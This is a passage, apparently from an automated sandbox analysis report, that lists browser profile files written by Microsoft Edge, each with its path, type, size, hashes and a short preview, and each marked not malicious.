                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.197 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/12-11:23:05.198 1fc4 Recovering log #3.2025/01/12-11:23:05.198 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):352
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.125399604737209
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uGDOq2P923oH+Tcwt7Uh2ghZIFUtQuNdZmwuuNvkwO923oH+Tcwt7Uh2gnLJ:76uGqv4YebIhHh2FUtQuNd/uuNv5LYeQ
                                                                                                                                                                                                                                                                                                                          MD5:31020AB8BB836CF593BE9253BA07A82E
                                                                                                                                                                                                                                                                                                                          SHA1:2BFBDC9393B01C94F248113D65203ECC1BEFA214
                                                                                                                                                                                                                                                                                                                          SHA-256:D3F433233088ACF17150149643DD0FDEEED8BDBD645271B59D0FF00FE3009AE8
                                                                                                                                                                                                                                                                                                                          SHA-512:5B98E58A8F60FC130042693B137818F445771AD120F3738B368B13C51A0923C517E0AD4F89669489E8BD280C60DE957F5FFF4C55D8C52A6167DD2284F9B52EC0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.197 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/01/12-11:23:05.198 1fc4 Recovering log #3.2025/01/12-11:23:05.198 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.195056124533447
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76u6N4v4YebvqBQFUtQu6NJ/uuj5LYebvqBvJ:76u6M4YebvZgQu62u1LYebvk
                                                                                                                                                                                                                                                                                                                          MD5:1DE628137005CE8B9147D1CF196D31A5
                                                                                                                                                                                                                                                                                                                          SHA1:CF701EA760CA35357794CFE0B4AFDF7A18387091
                                                                                                                                                                                                                                                                                                                          SHA-256:403AC82FC1EDEDC9EC340396B576766F5BC4E6A3424C5BB4140EFFE4F511828E
                                                                                                                                                                                                                                                                                                                          SHA-512:62A2A026E5839E054103C89ABC629EFFEBD9AE1C2678D1620F6AEA82E9E305B0B3E57A13E68733068485F19BBA9C7953762BB66F38F64EF16707B9D6C799B024
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.906 ae4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.906 ae4 Recovering log #3.2025/01/12-11:23:05.909 ae4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):431
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.195056124533447
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76u6N4v4YebvqBQFUtQu6NJ/uuj5LYebvqBvJ:76u6M4YebvZgQu62u1LYebvk
                                                                                                                                                                                                                                                                                                                          MD5:1DE628137005CE8B9147D1CF196D31A5
                                                                                                                                                                                                                                                                                                                          SHA1:CF701EA760CA35357794CFE0B4AFDF7A18387091
                                                                                                                                                                                                                                                                                                                          SHA-256:403AC82FC1EDEDC9EC340396B576766F5BC4E6A3424C5BB4140EFFE4F511828E
                                                                                                                                                                                                                                                                                                                          SHA-512:62A2A026E5839E054103C89ABC629EFFEBD9AE1C2678D1620F6AEA82E9E305B0B3E57A13E68733068485F19BBA9C7953762BB66F38F64EF16707B9D6C799B024
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.906 ae4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.906 ae4 Recovering log #3.2025/01/12-11:23:05.909 ae4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\602e7191-e0a3-4613-a2d5-2e85e1e1515b.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\74f61382-d164-45b1-ab6c-03f71153b7c8.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF43303.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a6dade1a-b352-4976-9fc2-d53d55e1ebdd.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.191964760509069
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76upUv4YebvqBZFUtQupo/uupk5LYebvqBaJ:76upe4YebvygQup3upOLYebvL
                                                                                                                                                                                                                                                                                                                          MD5:0D779EABC4E069D038D6DCAD3F1DAA9B
                                                                                                                                                                                                                                                                                                                          SHA1:526BB9A1BB9A7C780ED2104D8EDF4830EA858094
                                                                                                                                                                                                                                                                                                                          SHA-256:3874DC4365F92E661920481A1327126DF52BE3C4ABCDEC60AE13F92FE8C9F7D9
                                                                                                                                                                                                                                                                                                                          SHA-512:D5C75A5C17C893F8375B49BF28BBB5AA841276232B097005BAA702D4B0116027B2110DBC4391EBE6FB006D1A2D5BFACC27B5C646B70D7F5A6D7F5351991A872A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:23.804 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/12-11:23:23.805 bb0 Recovering log #3.2025/01/12-11:23:23.809 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):419
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.191964760509069
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76upUv4YebvqBZFUtQupo/uupk5LYebvqBaJ:76upe4YebvygQup3upOLYebvL
                                                                                                                                                                                                                                                                                                                          MD5:0D779EABC4E069D038D6DCAD3F1DAA9B
                                                                                                                                                                                                                                                                                                                          SHA1:526BB9A1BB9A7C780ED2104D8EDF4830EA858094
                                                                                                                                                                                                                                                                                                                          SHA-256:3874DC4365F92E661920481A1327126DF52BE3C4ABCDEC60AE13F92FE8C9F7D9
                                                                                                                                                                                                                                                                                                                          SHA-512:D5C75A5C17C893F8375B49BF28BBB5AA841276232B097005BAA702D4B0116027B2110DBC4391EBE6FB006D1A2D5BFACC27B5C646B70D7F5A6D7F5351991A872A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:23.804 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/12-11:23:23.805 bb0 Recovering log #3.2025/01/12-11:23:23.809 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.151554115714797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uBQ4q2P923oH+TcwtpIFUtQuBQJZmwuuBQDkwO923oH+Tcwta/WLJ:76uBQ4v4YebmFUtQuBQJ/uuBQD5LYeb7
                                                                                                                                                                                                                                                                                                                          MD5:365FD0BE0E6C8DFAAE81351129706B8B
                                                                                                                                                                                                                                                                                                                          SHA1:A391DBBC1DB80BF6E4FBD60F6DD297641F6FD693
                                                                                                                                                                                                                                                                                                                          SHA-256:5FFDA8E31A7B24F719589C47A2381738F84632107891B72ACEEB9BEB92232018
                                                                                                                                                                                                                                                                                                                          SHA-512:F80A576ADF07A759F613050E82ADC7555ABF2A4C4DD4DABB2ADB1A6FF3109145C374C604659DD1E7D5A4E6488AF7A2125E7B6F04FEE7B692723028AED35BD920
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.194 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/12-11:23:05.194 1ff4 Recovering log #3.2025/01/12-11:23:05.194 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.151554115714797
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uBQ4q2P923oH+TcwtpIFUtQuBQJZmwuuBQDkwO923oH+Tcwta/WLJ:76uBQ4v4YebmFUtQuBQJ/uuBQD5LYeb7
                                                                                                                                                                                                                                                                                                                          MD5:365FD0BE0E6C8DFAAE81351129706B8B
                                                                                                                                                                                                                                                                                                                          SHA1:A391DBBC1DB80BF6E4FBD60F6DD297641F6FD693
                                                                                                                                                                                                                                                                                                                          SHA-256:5FFDA8E31A7B24F719589C47A2381738F84632107891B72ACEEB9BEB92232018
                                                                                                                                                                                                                                                                                                                          SHA-512:F80A576ADF07A759F613050E82ADC7555ABF2A4C4DD4DABB2ADB1A6FF3109145C374C604659DD1E7D5A4E6488AF7A2125E7B6F04FEE7B692723028AED35BD920
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.194 1ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/12-11:23:05.194 1ff4 Recovering log #3.2025/01/12-11:23:05.194 1ff4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.265130411026952
                                                                                                                                                                                                                                                                                                                          Encrypted:false
